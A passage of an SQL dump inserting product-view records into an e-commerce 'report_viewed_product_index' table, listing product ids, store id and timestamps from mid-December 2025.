(23057, NULL, NULL, 2061, 1, '2025-12-14 06:45:18'),
(23058, NULL, NULL, 2058, 1, '2025-12-14 06:46:09'),
(23059, NULL, NULL, 2063, 1, '2025-12-14 06:46:59'),
(23060, NULL, NULL, 2062, 1, '2025-12-14 07:06:26'),
(23061, NULL, NULL, 2060, 1, '2025-12-14 07:17:28'),
(23062, NULL, NULL, 2059, 1, '2025-12-14 07:17:36'),
(23063, NULL, NULL, 2054, 1, '2025-12-14 10:58:39'),
(23064, NULL, NULL, 2055, 1, '2025-12-14 11:52:36'),
(23065, NULL, NULL, 2064, 1, '2025-12-14 11:56:14'),
(23066, NULL, NULL, 2055, 1, '2025-12-14 12:02:05'),
(23067, NULL, NULL, 2062, 1, '2025-12-14 12:02:10'),
(23068, NULL, NULL, 2061, 1, '2025-12-14 12:02:12'),
(23069, NULL, NULL, 2059, 1, '2025-12-14 12:02:13'),
(23070, NULL, NULL, 2058, 1, '2025-12-14 12:02:14'),
(23071, NULL, NULL, 2064, 1, '2025-12-14 12:02:15'),
(23072, NULL, NULL, 2063, 1, '2025-12-14 12:02:16'),
(23073, NULL, NULL, 2060, 1, '2025-12-14 12:02:17'),
(23074, NULL, NULL, 2053, 1, '2025-12-14 12:02:21'),
(23075, NULL, NULL, 2064, 1, '2025-12-14 12:07:12'),
(23076, NULL, NULL, 2061, 1, '2025-12-14 13:43:50'),
(23077, NULL, NULL, 2062, 1, '2025-12-14 15:51:42'),
(23078, NULL, NULL, 2061, 1, '2025-12-14 17:13:07'),
(23079, NULL, NULL, 2054, 1, '2025-12-14 17:58:33'),
(23080, NULL, NULL, 2064, 1, '2025-12-14 19:14:04'),
(23081, NULL, NULL, 2060, 1, '2025-12-14 19:29:23'),
(23082, NULL, NULL, 2060, 1, '2025-12-14 23:44:24'),
(23083, NULL, NULL, 2061, 1, '2025-12-14 23:46:38'),
(23084, NULL, NULL, 2055, 1, '2025-12-14 23:47:18'),
(23085, NULL, NULL, 2054, 1, '2025-12-14 23:47:38'),
(23086, NULL, NULL, 2053, 1, '2025-12-14 23:50:28'),
(23087, NULL, NULL, 2059, 1, '2025-12-14 23:51:25'),
(23088, NULL, NULL, 2058, 1, '2025-12-14 23:54:34'),
(23089, NULL, NULL, 2063, 1, '2025-12-15 00:15:00'),
(23090, NULL, NULL, 2060, 1, '2025-12-15 00:30:16'),
(23091, NULL, NULL, 2062, 1, '2025-12-15 01:31:03'),
(23092, NULL, NULL, 2064, 1, '2025-12-15 01:44:43'),
(23093, NULL, NULL, 2054, 1, '2025-12-15 07:01:18'),
(23094, NULL, NULL, 2062, 1, '2025-12-15 07:45:33'),
(23095, NULL, NULL, 2064, 1, '2025-12-15 08:45:43'),
(23096, NULL, NULL, 2060, 1, '2025-12-15 08:45:49'),
(23097, NULL, NULL, 2063, 1, '2025-12-15 08:45:51'),
(23098, NULL, NULL, 2058, 1, '2025-12-15 08:45:52'),
(23099, NULL, NULL, 2058, 1, '2025-12-15 08:45:53'),
(23100, NULL, NULL, 2061, 1, '2025-12-15 08:45:54'),
(23101, NULL, NULL, 2059, 1, '2025-12-15 08:45:56'),
(23102, NULL, NULL, 2062, 1, '2025-12-15 08:46:01'),
(23103, NULL, NULL, 2054, 1, '2025-12-15 08:46:02'),
(23104, NULL, NULL, 2054, 1, '2025-12-15 08:46:03'),
(23105, NULL, NULL, 2055, 1, '2025-12-15 08:46:10'),
(23106, NULL, NULL, 2064, 1, '2025-12-15 08:46:18'),
(23107, NULL, NULL, 2055, 1, '2025-12-15 08:46:21'),
(23108, NULL, NULL, 2053, 1, '2025-12-15 08:46:24'),
(23109, NULL, NULL, 2060, 1, '2025-12-15 08:46:29'),
(23110, NULL, NULL, 2064, 1, '2025-12-15 09:07:44'),
(23111, NULL, NULL, 2062, 1, '2025-12-15 09:20:38'),
(23112, NULL, NULL, 2060, 1, '2025-12-15 10:36:04'),
(23113, NULL, NULL, 2061, 1, '2025-12-15 11:16:03'),
(23114, NULL, NULL, 2064, 1, '2025-12-15 12:06:37'),
(23115, NULL, NULL, 2060, 1, '2025-12-15 12:48:59'),
(23116, NULL, NULL, 2060, 1, '2025-12-15 12:49:02'),
(23117, NULL, NULL, 2060, 1, '2025-12-15 13:26:29'),
(23118, NULL, NULL, 2062, 1, '2025-12-15 16:44:35'),
(23119, NULL, NULL, 2054, 1, '2025-12-15 16:55:51'),
(23120, NULL, NULL, 2064, 1, '2025-12-15 17:13:28'),
(23121, NULL, NULL, 2062, 1, '2025-12-15 17:38:29'),
(23122, NULL, NULL, 2064, 1, '2025-12-15 18:03:03'),
(23123, NULL, NULL, 2064, 1, '2025-12-15 18:38:00'),
(23124, NULL, NULL, 2060, 1, '2025-12-15 19:44:11'),
(23125, NULL, NULL, 2054, 1, '2025-12-15 19:46:56'),
(23126, NULL, NULL, 2058, 1, '2025-12-15 19:47:03'),
(23127, NULL, NULL, 2060, 1, '2025-12-15 21:18:35'),
(23128, NULL, NULL, 2058, 1, '2025-12-15 21:20:58'),
(23129, NULL, NULL, 2060, 1, '2025-12-15 22:16:43'),
(23130, NULL, NULL, 2055, 1, '2025-12-15 22:42:49'),
(23131, NULL, NULL, 2054, 1, '2025-12-15 23:58:25'),
(23132, NULL, NULL, 2054, 1, '2025-12-16 01:50:19'),
(23133, NULL, NULL, 2053, 1, '2025-12-16 01:53:58'),
(23134, NULL, NULL, 2064, 1, '2025-12-16 04:27:30'),
(23135, NULL, NULL, 2062, 1, '2025-12-16 07:24:05'),
(23136, NULL, NULL, 2064, 1, '2025-12-16 07:25:19'),
(23137, NULL, NULL, 2064, 1, '2025-12-16 08:08:32'),
(23138, NULL, NULL, 2060, 1, '2025-12-16 10:25:32'),
(23139, NULL, NULL, 2054, 1, '2025-12-16 12:04:12'),
(23140, NULL, NULL, 2060, 1, '2025-12-16 12:10:01'),
(23141, NULL, NULL, 2060, 1, '2025-12-16 13:41:54'),
(23142, NULL, NULL, 2053, 1, '2025-12-16 15:07:25'),
(23143, NULL, NULL, 2064, 1, '2025-12-16 15:08:10'),
(23144, NULL, NULL, 2055, 1, '2025-12-16 15:09:11'),
(23145, NULL, NULL, 2063, 1, '2025-12-16 15:12:10'),
(23146, NULL, NULL, 2062, 1, '2025-12-16 15:13:48'),
(23147, NULL, NULL, 2062, 1, '2025-12-16 15:33:42'),
(23148, NULL, NULL, 2064, 1, '2025-12-16 15:38:33'),
(23149, NULL, NULL, 2062, 1, '2025-12-16 15:57:39'),
(23150, NULL, NULL, 2058, 1, '2025-12-16 16:08:49'),
(23151, NULL, NULL, 2059, 1, '2025-12-16 19:58:28'),
(23152, NULL, NULL, 2060, 1, '2025-12-16 20:08:01'),
(23153, NULL, NULL, 2064, 1, '2025-12-16 22:19:15'),
(23154, NULL, NULL, 2053, 1, '2025-12-17 01:03:30'),
(23155, NULL, NULL, 2063, 1, '2025-12-17 01:27:22'),
(23156, NULL, NULL, 2064, 1, '2025-12-17 02:12:37'),
(23157, NULL, NULL, 2054, 1, '2025-12-17 02:39:36'),
(23158, NULL, NULL, 2054, 1, '2025-12-17 02:40:06'),
(23159, NULL, NULL, 2059, 1, '2025-12-17 02:49:12'),
(23160, NULL, NULL, 2062, 1, '2025-12-17 02:50:25'),
(23161, NULL, NULL, 2061, 1, '2025-12-17 02:50:27'),
(23162, NULL, NULL, 2058, 1, '2025-12-17 02:50:30'),
(23163, NULL, NULL, 2063, 1, '2025-12-17 02:51:28'),
(23164, NULL, NULL, 2060, 1, '2025-12-17 03:37:44'),
(23165, NULL, NULL, 2058, 1, '2025-12-17 05:38:04'),
(23166, NULL, NULL, 2064, 1, '2025-12-17 06:24:25'),
(23167, NULL, NULL, 2064, 1, '2025-12-17 06:35:20'),
(23168, NULL, NULL, 2060, 1, '2025-12-17 07:10:56'),
(23169, NULL, NULL, 2058, 1, '2025-12-17 07:23:38'),
(23170, NULL, NULL, 2063, 1, '2025-12-17 07:36:39'),
(23171, NULL, NULL, 2064, 1, '2025-12-17 08:18:05'),
(23172, NULL, NULL, 2064, 1, '2025-12-17 08:18:11'),
(23173, NULL, NULL, 2064, 1, '2025-12-17 08:18:11'),
(23174, 5401, NULL, 2064, 1, '2025-12-17 08:18:18'),
(23175, NULL, NULL, 2054, 1, '2025-12-17 09:31:14'),
(23176, NULL, NULL, 2053, 1, '2025-12-17 10:17:12'),
(23177, NULL, NULL, 2063, 1, '2025-12-17 11:55:34'),
(23178, NULL, NULL, 2063, 1, '2025-12-17 12:26:33'),
(23179, NULL, NULL, 2060, 1, '2025-12-17 14:02:55'),
(23180, NULL, NULL, 2060, 1, '2025-12-17 14:02:58'),
(23181, NULL, NULL, 2062, 1, '2025-12-17 15:32:27'),
(23182, NULL, NULL, 2064, 1, '2025-12-17 15:41:02'),
(23183, NULL, NULL, 2055, 1, '2025-12-17 15:54:39'),
(23184, NULL, NULL, 2062, 1, '2025-12-17 16:25:55'),
(23185, NULL, NULL, 2064, 1, '2025-12-17 16:36:32'),
(23186, NULL, NULL, 2054, 1, '2025-12-17 17:26:16'),
(23187, NULL, NULL, 2060, 1, '2025-12-17 17:38:03'),
(23188, NULL, NULL, 2059, 1, '2025-12-17 17:59:22'),
(23189, NULL, NULL, 2061, 1, '2025-12-17 18:28:18'),
(23190, NULL, NULL, 2064, 1, '2025-12-17 20:42:57'),
(23191, NULL, NULL, 2064, 1, '2025-12-17 21:06:26'),
(23192, NULL, NULL, 2061, 1, '2025-12-17 22:00:30'),
(23193, NULL, NULL, 2058, 1, '2025-12-17 22:09:57'),
(23194, NULL, NULL, 2060, 1, '2025-12-17 22:51:03'),
(23195, NULL, NULL, 2060, 1, '2025-12-17 22:52:24'),
(23196, NULL, NULL, 2060, 1, '2025-12-17 23:14:59'),
(23197, NULL, NULL, 2062, 1, '2025-12-18 00:44:58'),
(23198, NULL, NULL, 2054, 1, '2025-12-18 01:08:09'),
(23199, NULL, NULL, 2060, 1, '2025-12-18 05:25:24'),
(23200, NULL, NULL, 2059, 1, '2025-12-18 05:59:05'),
(23201, NULL, NULL, 2062, 1, '2025-12-18 06:19:41'),
(23202, NULL, NULL, 2055, 1, '2025-12-18 06:29:59'),
(23203, NULL, NULL, 2064, 1, '2025-12-18 07:36:33'),
(23204, NULL, NULL, 2054, 1, '2025-12-18 07:49:38'),
(23205, NULL, NULL, 2054, 1, '2025-12-18 08:30:23'),
(23206, NULL, NULL, 2058, 1, '2025-12-18 08:31:38'),
(23207, NULL, NULL, 2054, 1, '2025-12-18 10:54:05'),
(23208, NULL, NULL, 2064, 1, '2025-12-18 11:50:03'),
(23209, NULL, NULL, 2060, 1, '2025-12-18 12:19:03'),
(23210, NULL, NULL, 2058, 1, '2025-12-18 14:22:09'),
(23211, NULL, NULL, 2060, 1, '2025-12-18 14:30:05'),
(23212, NULL, NULL, 2060, 1, '2025-12-18 14:34:37'),
(23213, NULL, NULL, 2060, 1, '2025-12-18 14:43:31'),
(23214, NULL, NULL, 2064, 1, '2025-12-18 16:01:16'),
(23215, NULL, NULL, 2061, 1, '2025-12-18 17:03:33'),
(23216, NULL, NULL, 2062, 1, '2025-12-18 17:08:00'),
(23217, NULL, NULL, 2060, 1, '2025-12-18 17:17:46'),
(23218, NULL, NULL, 2062, 1, '2025-12-18 18:33:45'),
(23219, NULL, NULL, 2064, 1, '2025-12-18 18:35:07'),
(23220, NULL, NULL, 2053, 1, '2025-12-18 18:44:56'),
(23221, NULL, NULL, 2061, 1, '2025-12-18 18:51:24'),
(23222, NULL, NULL, 2058, 1, '2025-12-18 19:09:49'),
(23223, NULL, NULL, 2064, 1, '2025-12-18 19:42:57'),
(23224, NULL, NULL, 2054, 1, '2025-12-18 19:57:33'),
(23225, NULL, NULL, 2064, 1, '2025-12-18 21:38:06'),
(23226, NULL, NULL, 2060, 1, '2025-12-18 21:51:26'),
(23227, NULL, NULL, 2062, 1, '2025-12-18 21:57:49'),
(23228, NULL, NULL, 2063, 1, '2025-12-18 22:03:10'),
(23229, NULL, NULL, 2054, 1, '2025-12-18 22:27:41'),
(23230, NULL, NULL, 2061, 1, '2025-12-18 22:39:46'),
(23231, NULL, NULL, 2062, 1, '2025-12-18 22:39:50'),
(23232, NULL, NULL, 2063, 1, '2025-12-18 22:39:54'),
(23233, NULL, NULL, 2062, 1, '2025-12-18 23:13:13'),
(23234, NULL, NULL, 2061, 1, '2025-12-18 23:22:08'),
(23235, NULL, NULL, 2058, 1, '2025-12-18 23:42:48'),
(23236, NULL, NULL, 2059, 1, '2025-12-18 23:57:37'),
(23237, NULL, NULL, 2064, 1, '2025-12-19 02:03:53'),
(23238, NULL, NULL, 2054, 1, '2025-12-19 02:05:33'),
(23239, NULL, NULL, 2060, 1, '2025-12-19 03:41:05'),
(23240, NULL, NULL, 2054, 1, '2025-12-19 04:24:05'),
(23241, NULL, NULL, 2055, 1, '2025-12-19 05:15:18'),
(23242, NULL, NULL, 2064, 1, '2025-12-19 05:21:42'),
(23243, NULL, NULL, 2058, 1, '2025-12-19 05:29:57'),
(23244, NULL, NULL, 2054, 1, '2025-12-19 06:39:10'),
(23245, NULL, NULL, 2061, 1, '2025-12-19 06:58:57'),
(23246, NULL, NULL, 2053, 1, '2025-12-19 07:02:49'),
(23247, NULL, NULL, 2064, 1, '2025-12-19 07:05:22'),
(23248, NULL, NULL, 2055, 1, '2025-12-19 07:05:24'),
(23249, NULL, NULL, 2063, 1, '2025-12-19 07:16:18'),
(23250, NULL, NULL, 2062, 1, '2025-12-19 07:16:27'),
(23251, NULL, NULL, 2060, 1, '2025-12-19 11:08:06'),
(23252, NULL, NULL, 2064, 1, '2025-12-19 12:20:16'),
(23253, NULL, NULL, 2064, 1, '2025-12-19 12:20:42'),
(23254, NULL, NULL, 2062, 1, '2025-12-19 13:03:56'),
(23255, NULL, NULL, 2062, 1, '2025-12-19 15:24:35'),
(23256, NULL, NULL, 2064, 1, '2025-12-19 15:44:26'),
(23257, NULL, NULL, 2054, 1, '2025-12-19 15:45:13'),
(23258, NULL, NULL, 2061, 1, '2025-12-19 16:00:38'),
(23259, NULL, NULL, 2060, 1, '2025-12-19 17:02:15'),
(23260, NULL, NULL, 2061, 1, '2025-12-19 17:03:34'),
(23261, NULL, NULL, 2054, 1, '2025-12-19 17:15:04'),
(23262, NULL, NULL, 2053, 1, '2025-12-19 18:33:33'),
(23263, NULL, NULL, 2060, 1, '2025-12-19 19:24:33'),
(23264, NULL, NULL, 2055, 1, '2025-12-19 19:26:02'),
(23265, NULL, NULL, 2062, 1, '2025-12-19 20:59:19'),
(23266, NULL, NULL, 2061, 1, '2025-12-19 21:01:48'),
(23267, NULL, NULL, 2058, 1, '2025-12-19 21:02:08'),
(23268, NULL, NULL, 2059, 1, '2025-12-19 21:02:48'),
(23269, NULL, NULL, 2063, 1, '2025-12-19 21:03:16'),
(23270, NULL, NULL, 2054, 1, '2025-12-19 21:41:58'),
(23271, NULL, NULL, 2064, 1, '2025-12-19 22:40:24'),
(23272, NULL, NULL, 2064, 1, '2025-12-19 23:20:56'),
(23273, NULL, NULL, 2062, 1, '2025-12-20 00:15:02'),
(23274, NULL, NULL, 2063, 1, '2025-12-20 00:15:02'),
(23275, NULL, NULL, 2064, 1, '2025-12-20 00:15:02'),
(23276, NULL, NULL, 2064, 1, '2025-12-20 00:15:02'),
(23277, NULL, NULL, 2064, 1, '2025-12-20 00:15:02'),
(23278, NULL, NULL, 2060, 1, '2025-12-20 00:15:02'),
(23279, NULL, NULL, 2061, 1, '2025-12-20 00:15:02'),
(23280, NULL, NULL, 2059, 1, '2025-12-20 00:15:02'),
(23281, NULL, NULL, 2062, 1, '2025-12-20 00:15:05'),
(23282, NULL, NULL, 2064, 1, '2025-12-20 00:15:06'),
(23283, NULL, NULL, 2063, 1, '2025-12-20 00:15:06'),
(23284, NULL, NULL, 2064, 1, '2025-12-20 00:15:07'),
(23285, NULL, NULL, 2062, 1, '2025-12-20 00:15:07'),
(23286, NULL, NULL, 2064, 1, '2025-12-20 00:15:08'),
(23287, NULL, NULL, 2061, 1, '2025-12-20 00:15:08'),
(23288, NULL, NULL, 2059, 1, '2025-12-20 00:15:08'),
(23289, NULL, NULL, 2060, 1, '2025-12-20 00:15:08'),
(23290, NULL, NULL, 2064, 1, '2025-12-20 00:15:08'),
(23291, NULL, NULL, 2063, 1, '2025-12-20 00:15:08'),
(23292, NULL, NULL, 2064, 1, '2025-12-20 00:15:09'),
(23293, NULL, NULL, 2064, 1, '2025-12-20 00:15:10'),
(23294, NULL, NULL, 2063, 1, '2025-12-20 00:15:10'),
(23295, NULL, NULL, 2061, 1, '2025-12-20 00:15:11'),
(23296, NULL, NULL, 2062, 1, '2025-12-20 00:15:11'),
(23297, NULL, NULL, 2055, 1, '2025-12-20 00:15:13'),
(23298, NULL, NULL, 2063, 1, '2025-12-20 00:15:13'),
(23299, NULL, NULL, 2064, 1, '2025-12-20 00:15:13'),
(23300, NULL, NULL, 2064, 1, '2025-12-20 00:15:13'),
(23301, NULL, NULL, 2059, 1, '2025-12-20 00:15:13'),
(23302, NULL, NULL, 2054, 1, '2025-12-20 00:15:13'),
(23303, NULL, NULL, 2064, 1, '2025-12-20 00:15:14'),
(23304, NULL, NULL, 2060, 1, '2025-12-20 00:15:15'),
(23305, NULL, NULL, 2064, 1, '2025-12-20 00:15:15'),
(23306, NULL, NULL, 2064, 1, '2025-12-20 00:15:15'),
(23307, NULL, NULL, 2063, 1, '2025-12-20 00:15:15'),
(23308, NULL, NULL, 2062, 1, '2025-12-20 00:15:16'),
(23309, NULL, NULL, 2064, 1, '2025-12-20 00:15:16'),
(23310, NULL, NULL, 2061, 1, '2025-12-20 00:15:16'),
(23311, NULL, NULL, 2055, 1, '2025-12-20 00:15:18'),
(23312, NULL, NULL, 2063, 1, '2025-12-20 00:15:18'),
(23313, NULL, NULL, 2058, 1, '2025-12-20 00:15:19'),
(23314, NULL, NULL, 2064, 1, '2025-12-20 00:15:21'),
(23315, NULL, NULL, 2054, 1, '2025-12-20 00:15:21'),
(23316, NULL, NULL, 2064, 1, '2025-12-20 00:15:21'),
(23317, NULL, NULL, 2062, 1, '2025-12-20 00:15:21'),
(23318, NULL, NULL, 2063, 1, '2025-12-20 00:15:21'),
(23319, NULL, NULL, 2061, 1, '2025-12-20 00:15:21'),
(23320, NULL, NULL, 2064, 1, '2025-12-20 00:15:22'),
(23321, NULL, NULL, 2060, 1, '2025-12-20 00:15:24'),
(23322, NULL, NULL, 2055, 1, '2025-12-20 00:15:24'),
(23323, NULL, NULL, 2058, 1, '2025-12-20 00:15:26'),
(23324, NULL, NULL, 2059, 1, '2025-12-20 00:15:26'),
(23325, NULL, NULL, 2058, 1, '2025-12-20 00:15:26'),
(23326, NULL, NULL, 2054, 1, '2025-12-20 00:15:26'),
(23327, NULL, NULL, 2054, 1, '2025-12-20 00:15:26'),
(23328, NULL, NULL, 2053, 1, '2025-12-20 00:15:26'),
(23329, NULL, NULL, 2053, 1, '2025-12-20 00:15:27'),
(23330, NULL, NULL, 2053, 1, '2025-12-20 00:15:27'),
(23331, NULL, NULL, 2055, 1, '2025-12-20 00:15:27'),
(23332, NULL, NULL, 2059, 1, '2025-12-20 00:15:27'),
(23333, NULL, NULL, 2055, 1, '2025-12-20 00:15:27'),
(23334, NULL, NULL, 2053, 1, '2025-12-20 00:15:28'),
(23335, NULL, NULL, 2060, 1, '2025-12-20 00:15:28'),
(23336, NULL, NULL, 2058, 1, '2025-12-20 00:15:28'),
(23337, NULL, NULL, 2054, 1, '2025-12-20 00:15:29'),
(23338, NULL, NULL, 2053, 1, '2025-12-20 00:15:29'),
(23339, NULL, NULL, 2053, 1, '2025-12-20 00:15:29'),
(23340, NULL, NULL, 2058, 1, '2025-12-20 00:15:29'),
(23341, NULL, NULL, 2055, 1, '2025-12-20 00:15:33'),
(23342, NULL, NULL, 2053, 1, '2025-12-20 00:15:33'),
(23343, NULL, NULL, 2059, 1, '2025-12-20 00:15:33');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(23344, NULL, NULL, 2053, 1, '2025-12-20 00:15:33'),
(23345, NULL, NULL, 2060, 1, '2025-12-20 00:15:33'),
(23346, NULL, NULL, 2058, 1, '2025-12-20 00:15:33'),
(23347, NULL, NULL, 2053, 1, '2025-12-20 00:15:34'),
(23348, NULL, NULL, 2054, 1, '2025-12-20 00:15:34'),
(23349, NULL, NULL, 2058, 1, '2025-12-20 00:15:35'),
(23350, NULL, NULL, 2053, 1, '2025-12-20 00:15:36'),
(23351, NULL, NULL, 2053, 1, '2025-12-20 00:15:36'),
(23352, NULL, NULL, 2053, 1, '2025-12-20 00:15:36'),
(23353, NULL, NULL, 2059, 1, '2025-12-20 00:15:36'),
(23354, NULL, NULL, 2059, 1, '2025-12-20 00:15:36'),
(23355, NULL, NULL, 2059, 1, '2025-12-20 00:15:36'),
(23356, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23357, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23358, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23359, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23360, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23361, NULL, NULL, 2058, 1, '2025-12-20 00:15:38'),
(23362, NULL, NULL, 2054, 1, '2025-12-20 00:15:39'),
(23363, NULL, NULL, 2054, 1, '2025-12-20 00:15:39'),
(23364, NULL, NULL, 2054, 1, '2025-12-20 00:15:40'),
(23365, NULL, NULL, 2055, 1, '2025-12-20 00:15:40'),
(23366, NULL, NULL, 2055, 1, '2025-12-20 00:15:41'),
(23367, NULL, NULL, 2055, 1, '2025-12-20 00:15:41'),
(23368, NULL, NULL, 2055, 1, '2025-12-20 00:15:41'),
(23369, NULL, NULL, 2055, 1, '2025-12-20 00:15:41'),
(23370, NULL, NULL, 2055, 1, '2025-12-20 00:15:42'),
(23371, NULL, NULL, 2055, 1, '2025-12-20 00:15:42'),
(23372, NULL, NULL, 2053, 1, '2025-12-20 00:15:42'),
(23373, NULL, NULL, 2053, 1, '2025-12-20 00:15:42'),
(23374, NULL, NULL, 2059, 1, '2025-12-20 00:15:42'),
(23375, NULL, NULL, 2059, 1, '2025-12-20 00:15:42'),
(23376, NULL, NULL, 2059, 1, '2025-12-20 00:15:43'),
(23377, NULL, NULL, 2059, 1, '2025-12-20 00:15:43'),
(23378, NULL, NULL, 2053, 1, '2025-12-20 00:15:43'),
(23379, NULL, NULL, 2053, 1, '2025-12-20 00:15:43'),
(23380, NULL, NULL, 2059, 1, '2025-12-20 00:15:44'),
(23381, NULL, NULL, 2054, 1, '2025-12-20 00:15:45'),
(23382, NULL, NULL, 2054, 1, '2025-12-20 00:15:45'),
(23383, NULL, NULL, 2058, 1, '2025-12-20 00:15:45'),
(23384, NULL, NULL, 2054, 1, '2025-12-20 00:15:45'),
(23385, NULL, NULL, 2058, 1, '2025-12-20 00:15:45'),
(23386, NULL, NULL, 2054, 1, '2025-12-20 00:15:45'),
(23387, NULL, NULL, 2058, 1, '2025-12-20 00:15:46'),
(23388, NULL, NULL, 2058, 1, '2025-12-20 00:15:47'),
(23389, NULL, NULL, 2058, 1, '2025-12-20 00:15:47'),
(23390, NULL, NULL, 2054, 1, '2025-12-20 00:15:47'),
(23391, NULL, NULL, 2060, 1, '2025-12-20 00:15:48'),
(23392, NULL, NULL, 2060, 1, '2025-12-20 00:15:49'),
(23393, NULL, NULL, 2058, 1, '2025-12-20 00:15:49'),
(23394, NULL, NULL, 2060, 1, '2025-12-20 00:15:49'),
(23395, NULL, NULL, 2060, 1, '2025-12-20 00:15:50'),
(23396, NULL, NULL, 2060, 1, '2025-12-20 00:15:50'),
(23397, NULL, NULL, 2060, 1, '2025-12-20 00:15:50'),
(23398, NULL, NULL, 2060, 1, '2025-12-20 00:15:51'),
(23399, NULL, NULL, 2060, 1, '2025-12-20 00:15:51'),
(23400, NULL, NULL, 2055, 1, '2025-12-20 00:15:52'),
(23401, NULL, NULL, 2058, 1, '2025-12-20 00:15:53'),
(23402, NULL, NULL, 2058, 1, '2025-12-20 00:15:54'),
(23403, NULL, NULL, 2058, 1, '2025-12-20 00:15:54'),
(23404, NULL, NULL, 2059, 1, '2025-12-20 00:15:56'),
(23405, NULL, NULL, 2058, 1, '2025-12-20 00:15:56'),
(23406, NULL, NULL, 2058, 1, '2025-12-20 00:15:56'),
(23407, NULL, NULL, 2053, 1, '2025-12-20 00:15:59'),
(23408, NULL, NULL, 2059, 1, '2025-12-20 00:15:59'),
(23409, NULL, NULL, 2053, 1, '2025-12-20 00:15:59'),
(23410, NULL, NULL, 2059, 1, '2025-12-20 00:15:59'),
(23411, NULL, NULL, 2058, 1, '2025-12-20 00:16:00'),
(23412, NULL, NULL, 2054, 1, '2025-12-20 00:16:00'),
(23413, NULL, NULL, 2058, 1, '2025-12-20 00:16:01'),
(23414, NULL, NULL, 2058, 1, '2025-12-20 00:16:01'),
(23415, NULL, NULL, 2054, 1, '2025-12-20 00:16:01'),
(23416, NULL, NULL, 2058, 1, '2025-12-20 00:16:01'),
(23417, NULL, NULL, 2055, 1, '2025-12-20 00:16:01'),
(23418, NULL, NULL, 2054, 1, '2025-12-20 00:16:01'),
(23419, NULL, NULL, 2054, 1, '2025-12-20 00:16:02'),
(23420, NULL, NULL, 2060, 1, '2025-12-20 00:16:02'),
(23421, NULL, NULL, 2054, 1, '2025-12-20 00:16:02'),
(23422, NULL, NULL, 2059, 1, '2025-12-20 00:16:02'),
(23423, NULL, NULL, 2055, 1, '2025-12-20 00:16:03'),
(23424, NULL, NULL, 2055, 1, '2025-12-20 00:16:03'),
(23425, NULL, NULL, 2058, 1, '2025-12-20 00:16:04'),
(23426, NULL, NULL, 2058, 1, '2025-12-20 00:16:04'),
(23427, NULL, NULL, 2059, 1, '2025-12-20 00:16:05'),
(23428, NULL, NULL, 2053, 1, '2025-12-20 00:16:05'),
(23429, NULL, NULL, 2059, 1, '2025-12-20 00:16:06'),
(23430, NULL, NULL, 2060, 1, '2025-12-20 00:16:06'),
(23431, NULL, NULL, 2058, 1, '2025-12-20 00:16:06'),
(23432, NULL, NULL, 2053, 1, '2025-12-20 00:16:07'),
(23433, NULL, NULL, 2059, 1, '2025-12-20 00:16:07'),
(23434, NULL, NULL, 2059, 1, '2025-12-20 00:16:07'),
(23435, NULL, NULL, 2054, 1, '2025-12-20 00:16:07'),
(23436, NULL, NULL, 2059, 1, '2025-12-20 00:16:07'),
(23437, NULL, NULL, 2055, 1, '2025-12-20 00:16:07'),
(23438, NULL, NULL, 2055, 1, '2025-12-20 00:16:08'),
(23439, NULL, NULL, 2055, 1, '2025-12-20 00:16:08'),
(23440, NULL, NULL, 2055, 1, '2025-12-20 00:16:08'),
(23441, NULL, NULL, 2055, 1, '2025-12-20 00:16:09'),
(23442, NULL, NULL, 2058, 1, '2025-12-20 00:16:09'),
(23443, NULL, NULL, 2058, 1, '2025-12-20 00:16:10'),
(23444, NULL, NULL, 2060, 1, '2025-12-20 00:16:10'),
(23445, NULL, NULL, 2060, 1, '2025-12-20 00:16:10'),
(23446, NULL, NULL, 2058, 1, '2025-12-20 00:16:10'),
(23447, NULL, NULL, 2060, 1, '2025-12-20 00:16:11'),
(23448, NULL, NULL, 2060, 1, '2025-12-20 00:16:11'),
(23449, NULL, NULL, 2060, 1, '2025-12-20 00:16:11'),
(23450, NULL, NULL, 2058, 1, '2025-12-20 00:16:11'),
(23451, NULL, NULL, 2060, 1, '2025-12-20 00:16:11'),
(23452, NULL, NULL, 2058, 1, '2025-12-20 00:16:12'),
(23453, NULL, NULL, 2055, 1, '2025-12-20 00:16:13'),
(23454, NULL, NULL, 2054, 1, '2025-12-20 00:16:13'),
(23455, NULL, NULL, 2055, 1, '2025-12-20 00:16:13'),
(23456, NULL, NULL, 2055, 1, '2025-12-20 00:16:13'),
(23457, NULL, NULL, 2058, 1, '2025-12-20 00:16:15'),
(23458, NULL, NULL, 2058, 1, '2025-12-20 00:16:15'),
(23459, NULL, NULL, 2058, 1, '2025-12-20 00:16:16'),
(23460, NULL, NULL, 2058, 1, '2025-12-20 00:16:16'),
(23461, NULL, NULL, 2058, 1, '2025-12-20 00:16:18'),
(23462, NULL, NULL, 2059, 1, '2025-12-20 00:16:19'),
(23463, NULL, NULL, 2053, 1, '2025-12-20 00:16:19'),
(23464, NULL, NULL, 2059, 1, '2025-12-20 00:16:19'),
(23465, NULL, NULL, 2053, 1, '2025-12-20 00:16:19'),
(23466, NULL, NULL, 2058, 1, '2025-12-20 00:16:19'),
(23467, NULL, NULL, 2058, 1, '2025-12-20 00:16:20'),
(23468, NULL, NULL, 2054, 1, '2025-12-20 00:16:21'),
(23469, NULL, NULL, 2054, 1, '2025-12-20 00:16:21'),
(23470, NULL, NULL, 2058, 1, '2025-12-20 00:16:21'),
(23471, NULL, NULL, 2054, 1, '2025-12-20 00:16:21'),
(23472, NULL, NULL, 2058, 1, '2025-12-20 00:16:22'),
(23473, NULL, NULL, 2058, 1, '2025-12-20 00:16:22'),
(23474, NULL, NULL, 2054, 1, '2025-12-20 00:16:22'),
(23475, NULL, NULL, 2054, 1, '2025-12-20 00:16:23'),
(23476, NULL, NULL, 2060, 1, '2025-12-20 00:16:23'),
(23477, NULL, NULL, 2058, 1, '2025-12-20 00:16:24'),
(23478, NULL, NULL, 2054, 1, '2025-12-20 00:16:24'),
(23479, NULL, NULL, 2059, 1, '2025-12-20 00:16:25'),
(23480, NULL, NULL, 2058, 1, '2025-12-20 00:16:25'),
(23481, NULL, NULL, 2055, 1, '2025-12-20 00:16:25'),
(23482, NULL, NULL, 2055, 1, '2025-12-20 00:16:26'),
